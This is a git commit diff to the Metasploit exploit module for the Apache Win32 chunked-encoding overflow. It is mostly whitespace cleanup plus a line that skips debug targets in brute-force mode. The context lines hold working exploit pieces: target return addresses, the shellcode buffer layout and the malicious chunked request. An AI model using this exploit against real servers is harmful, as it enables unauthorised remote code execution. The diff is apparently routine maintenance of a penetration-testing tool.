Skip the debugging target for automatic mode

git-svn-id: file:///home/svn/framework3/trunk@8499 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-15 01:02:12 +00:00 · 2010-02-15 01:02:12 +00:00 · 32357b1f64
parent 5d7139ad6f
commit 32357b1f64
1 changed files with 17 additions and 15 deletions
--- a/modules/exploits/windows/http/apache_chunked.rb
+++ b/modules/exploits/windows/http/apache_chunked.rb
@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpClient

 	def initialize(info = {})
-		super(update_info(info,	
+		super(update_info(info,
 			'Name'           => 'Apache Win32 Chunked Encoding',
 			'Description'    => %q{
 				This module exploits the chunked transfer integer wrap
@ -55,24 +55,24 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

 				},
-			'Targets'        => 
+			'Targets'        =>
 				[
 					[  'Windows Generic Bruteforce', {} ],

 					# Official Apache.org win32 builds
-					[  'Apache.org Build 1.3.9->1.3.19', 
+					[  'Apache.org Build 1.3.9->1.3.19',
 						{
-							'Ret' => 0x00401151, 
+							'Ret' => 0x00401151,
 							'Pad' => [6,2,0,4,1,3,5,7]
 						}
 					],
-					[  'Apache.org Build 1.3.22->1.3.24', 
+					[  'Apache.org Build 1.3.22->1.3.24',
 						{
-							'Ret' => 0x00401141, 
+							'Ret' => 0x00401141,
 							'Pad' => [2,6,0,4,1,3,5,7]
 						}
 					],
-					[  'Apache.org Build 1.3.19->1.3.24', 
+					[  'Apache.org Build 1.3.19->1.3.24',
 						{
 							'Ret' => 0x6ff6548d,
 							'Pad' => [2,6,0,4,1,3,5,7]
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],

-					# Pop/Pop/Return on Windows 2000 
+					# Pop/Pop/Return on Windows 2000
 					[  'Windows 2000 English',
 						{
 							'Ret' => 0x75022ac4,
@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote

 		if response.nil?
 			print_status("No response to request")
-			return Exploit::CheckCode::Safe 
+			return Exploit::CheckCode::Safe
 		end

 		code = Exploit::CheckCode::Appears
@ -198,6 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if target_index == 0
 			targets.each_with_index { |targ, idx|
 				next if idx == 0
+				next if targ.name =~ /Debug/

 				exploit_target(targ)
 			}
@ -208,9 +209,9 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit_target(target)
 		target['Pad'].each { |pad|
-			pattern = 
-				rand_text_alphanumeric(3936) + 
-				payload.encoded + 
+			pattern =
+				rand_text_alphanumeric(3936) +
+				payload.encoded +
 				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
 				rand_text_alphanumeric(pad)

@ -237,13 +238,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			#       v       |    v           |  v v      |    | v v    |      | v v    |
 			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
 			#
-		
+
 			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

 			# Build the request
 			send_request_raw({
 				'uri'     => '/',
-				'headers' => 
+				'headers' =>
 					{
 						'Transfer-Encoding' => "CHUNKED"
 					},
@ -256,3 +257,4 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 end
+